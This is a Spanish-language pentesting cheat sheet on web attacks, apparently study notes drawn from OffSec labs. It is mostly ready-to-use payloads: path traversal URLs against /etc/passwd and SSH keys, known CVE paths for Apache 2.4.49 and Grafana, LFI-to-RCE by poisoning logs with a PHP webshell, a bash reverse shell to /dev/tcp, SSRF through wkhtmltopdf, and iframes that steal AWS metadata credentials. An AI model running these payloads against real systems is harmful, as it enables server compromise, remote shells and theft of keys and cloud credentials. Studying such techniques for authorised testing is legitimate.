Web Attacks

Directory traversal / Path Traversal

Directory traversal / Path Traversal: Podemos LEER archivos recorriendo diferentes rutas del servidor.

Linux

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd 

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

// Apache 2.4.49

http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd 

http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd 

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd 

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

// Grafana 8.0.1 - https://github.com/jas502n/Grafana-CVE-2021-43798 

192.168.207.16:3000/public/plugins/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/install.txt

// maquina boolean proving grounds

cwd=../../../../../../etc&file=passwd 

// otras rutas interesantes

/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/.htpasswd
/var/log/auth.log

Windows

http://mountaindesserts.com/meteor/index.php?page=C:\Windows\System32\drivers\etc\hosts
http://mountaindesserts.com/meteor/index.php?page=C:\inetpub\logs\LogFiles\W3SVC1\
http://mountaindesserts.com/meteor/index.php?page=C:\inetpub\wwwroot\web.config
http://mountaindesserts.com/meteor/index.php?page=C:\Users\install.txt
http://mountaindesserts.com/meteor/index.php?page=C:/xampp/apache/logs/access.log

Windows/win.ini

Try also to change / for \
Try also to remove C:/ and add ../../../../../

Top 25 vulnerable params

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload} 
?detail={payload} 
?file={payload} 
?download={payload} 
?path={payload} 
?folder={payload} 
?prefix={payload} 
?include={payload} 
?page={payload} 
?inc={payload} 
?locate={payload} 
?show={payload} 
?doc={payload} 
?site={payload} 
?type={payload} 
?view={payload} 
?content={payload} 
?document={payload} 
?layout={payload} 
?mod={payload} 
?conf={payload}

Burp Suite Filter History:

\?(cat|dir|action|board|date|detail|file|download|path|folder|prefix|include|page|inc|locate|show|doc|site|type|view|content|document|layout|mod|conf)={[^}]+}

---

Local File Inclusion (LFI)

LFI: Podemos cargar y ejecutar archivos en el contexto del usuario el cual está corriendo el servidor.

LFI TO RCE via Log Poisoning

Esta técnica se centra en envenenar los logs con comandos para luego, al cargar dichos logs se interprete nuestro código y tengamos ejecución remota de comandos (RCE).

Rutas de logs:

Windows: C:\xampp\apache\logs
Linux: /var/log/apache2/access.log

Ejemplo en Linux:

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log

Respuesta HTTP: 
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-""Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" 

• Paso 1: Envenenar access.log

// Insertar en user agent: <?php echo system($_GET['cmd']); ?>

GET /meteor/index.php?page=admin.php HTTP/1.1
HOST: mountaindesserts.com
User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>
Accept: ….

• Paso 2: Ejecutar el código con curl

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami

// en caso que se rompa la consulta con espacio usar %20 -> ls%20-la

• Paso 3: Reverse shell

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

Recomiendo utilizar: https://www.revshells.com/, de las mejores páginas para crear reverse shells.

LFI en Windows:

La explotación de LFI en Windows sólo difiere de Linux en lo que respecta a las rutas de los archivos y la ejecución del código. El fragmento de código PHP que utilizamos en esta sección para Linux también funciona en Windows, ya que utilizamos la función del sistema PHP que es independiente del sistema operativo subyacente. Cuando utilizamos Log Poisoning en Windows, debemos entender que los archivos de registro se encuentran en rutas específicas de la aplicación. Por ejemplo, en un objetivo que ejecuta XAMPP , los registros de Apache se pueden encontrar en C:\xampp\apache\logs\ .

LFI To RCE - Abusing /proc/self/fd/X + Log Poisoning

Video explicativo de Savitar: https://www.youtube.com/watch?v=4VnatIievBE&ab_channel=S4viOnLive%28BackupDirectosdeTwitch%29

Finding private keys

En algunas situaciones no tenemos el fichero id_rsa, por lo que debemos consultar el authorized_keys y ver qué tipo de clave es:

http://r4z0r.com/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/home/anita/.ssh/authorized_keys

Revisar que tipo de claves hay, si muestra ecdsa no va a ser id_rsa, va a ser id_ecdsa:

/home/userE/.ssh/id_ecdsa.pub    // public key
/home/userE/.ssh/id_ecdsa        // private key

SSRF + LFI - WkhtmltoPdf

Crear un archivo php:

<?php
header('Location: file:///Windows/win.ini');
?>

Levantar un server en php:

php -S 0.0.0.0:80

Lanzamos un curl donde en el body agregamos la url a nuestro servidor:

curl -i -s -k -X POST --data-binary 'url=192.168.45.213%2Findex.php' 'http://192.168.209.177/Process.php'

HTTP Response:

HTTP/1.1 302 Found
Date: Thu, 09 May 2024 23:28:01 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Location: /pdfs/2251732e06fddc00474e3f6ccd514164.pdf
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Luego visitamos la siguiente URL del PDF donde podemos ver a nuestro win.ini:

http://192.168.209.177/pdfs/2251732e06fddc00474e3f6ccd514164.pdf

Otro payload útil:

<?php
header('Location: file:///Users/p4yl0ad/.ssh/id_rsa');
?>

WkhtmltoPdf - Pentest - Caso Real

A través de exiftool analizo el PDF que generaba la plataforma:

exiftool

En la petición donde se generaba el pdf, viajaba un campo HTML, donde podíamos insertar código HTML.

Al descargar el archivo PDF generado vemos el iframe que realizó una solicitud a mi Burp Collaborator confirmando el SSRF:

SSRF en PDF

Luego intentamos obtener información de la metadata de la instancia de AWS:

// Ruta para consultar la metadata de la instancia
http://169.254.169.254/latest/meta-data

// Payload completo
<iframe src=http://169.254.169.254/latest/meta-data/ width=500 height=500>

// Payload final
<iframe src=http://169.254.169.254/latest/meta-data/iam/security-credentials/{ROLE-NAME}

Por último, nos traemos la información necesaria para autenticarnos a AWS:

Finalmente nos autenticamos con awscli. El archivo de configuración se encuentra en `~/.aws/credentials` y debería tener el siguiente formato:

[default]
aws_access_key_id = YOUR_ACCESS_KEY_ID
aws_secret_access_key = YOUR_SECRET_ACCESS_KEY
aws_session_token = TOKEN # esta es la que agregaremos

Recordar que es una credencial temporal, y debemos agregar el token de sesión.

De aquí ya empieza la enumeración de AWS que ya es otra historia. Pero la cosa no termina aquí, esta librería también era vulnerable a LFI:

// Payload LFI
<!DOCTYPE html><head><meta http-equiv='Content-Type' content='text/html; charset=UTF-8'><body><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)}; x.open('GET','file:///etc/passwd');x.send();</script></body>"}